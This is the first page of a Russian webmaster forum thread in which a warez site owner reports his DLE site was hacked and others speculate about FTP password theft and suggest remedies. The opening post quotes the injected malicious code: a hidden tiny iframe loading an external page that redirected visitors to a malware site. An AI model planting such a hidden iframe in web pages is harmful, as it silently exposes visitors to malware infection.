X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
> Взломали сайт, на DLE
Frankie
Frankie
Topic Starter сообщение 20.4.2010, 22:32; Ответить: Frankie
Сообщение #1


Блин, вышел из дома вечером на пару часов, с друзьями пива попить...
Возвращаюсь домой, а варезник из подписи поломали и вставили вредоносный код.
Вычислил я его в страницах index.php и main.tpl, код был вот такой
<iframe src="http://fiwzv.ru/top/iframe.php" width=2 height=2 style="visibility: hidden"></iframe>

код редиректил пользователя на сайт с вирусом.
написал хостеру, посмотрим че ответят.

Отсюда вопрос: каким образом могли поломать? Подозреваю, что взломали не сам сайт, а вероятно фтп, раз добрались до index.php
Есть у кого-то мысли какие-то по этом поводу?

Сообщение отредактировал Frankie - 20.4.2010, 23:56
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Mike1111
Mike1111
сообщение 20.4.2010, 22:36; Ответить: Mike1111
Сообщение #2


Какая защита на машине стоит? Антивирь, фаервол?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
guz
guz
сообщение 20.4.2010, 22:39; Ответить: guz
Сообщение #3


спёрли пароли в фтп, у меня постоянно так ломают, ничего страшного , смени пароли на хостинге и все. с Тотал коммандер постоянно воруют.

Сообщение отредактировал guz - 20.4.2010, 22:40


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
N1cE
N1cE
сообщение 20.4.2010, 22:42; Ответить: N1cE
Сообщение #4


(guz @ 21.4.2010, 0:39) *
ничего страшного

То есть - ломают сайты и по*уй - пускай ломают, делов то - пароли постоянно менять и шнягу с сайта снимать вилкой как лапшу?
P.S. Простите за мой французкий blush.gif
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
werts
werts
сообщение 20.4.2010, 22:43; Ответить: werts
Сообщение #5


У меня ломали через FTP, по глупости пароли в Total Commander оставлял. Вредоносный код был добавлен вовсе файлы index и main в конец страницы.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Frankie
Frankie
Topic Starter сообщение 20.4.2010, 22:48; Ответить: Frankie
Сообщение #6


(Mike1111 @ 20.4.2010, 22:36) *
Какая защита на машине стоит? Антивирь, фаервол?

на коме стоит Dr.Web Security Space(вроде так называется, непомню как правильно, но в общем комплексная защита)
(guz @ 20.4.2010, 22:39) *
спёрли пароли в фтп, у меня постоянно так ломают, ничего страшного , смени пароли на хостинге и все. с Тотал коммандер постоянно воруют.

в том и дело, что пароли не храню в тотале

при каждом подключении ввожу пароль заново
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ChristmasNet
ChristmasNet
сообщение 20.4.2010, 23:00; Ответить: ChristmasNet
Сообщение #7


Пора значит двиг обновлять
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
guz
guz
сообщение 20.4.2010, 23:09; Ответить: guz
Сообщение #8


(N1cE @ 20.4.2010, 22:42) *
То есть - ломают сайты и по*уй - пускай ломают, делов то - пароли постоянно менять и шнягу с сайта снимать вилкой как лапшу?
P.S. Простите за мой французкий blush.gif

ломают редко, может раз в пол года, бекапы есть, антивирь стоит касперский лицензия, пароли не храню ввожу каждый раз...а ломают, вместо того чтобы гадать, раз в пол года можно почистить и сменить...

а еще проще - лучшая защита - раз в месяц менять все пароли и все.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
FeraS
FeraS
сообщение 20.4.2010, 23:13; Ответить: FeraS
Сообщение #9


Не юзайте крякнутый тоталкомандер. По своему горькому опыту знаю. Тоже ломали не раз. Лучше вообще юзать что-нибудь типа FileZilla.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Frankie
Frankie
Topic Starter сообщение 20.4.2010, 23:15; Ответить: Frankie
Сообщение #10


(ChristmasNet @ 20.4.2010, 23:00) *
Пора значит двиг обновлять

возможно... сейчас сайт работает на 8.2, с заплаткой. нулл от мид-тима
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Ваш сайт блокирует Роскомнадзор?
23 hollywooduk 5091 Вчера, 10:43
автор: hollywooduk
Открытая тема (нет новых ответов) Тысячи ботовых переходов на сайт
18 Suagaring 4536 26.3.2024, 21:42
автор: c4p1t4l15t
Открытая тема (нет новых ответов) Блог: городской сми сайт в Прибалтике
23 kapusta1 3527 24.3.2024, 22:02
автор: Liudmila
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлы[Услуги] Баннер/Графика/Сайт
238 FillPlay 179384 23.3.2024, 16:31
автор: freeax
Открытая тема (нет новых ответов) Пишет кто отзывы на сайт в янднекс с разных аккаунтах
1 TenDemon_rs 1126 22.3.2024, 13:18
автор: writer80


 



RSS Текстовая версия Сейчас: 28.3.2024, 18:52
Дизайн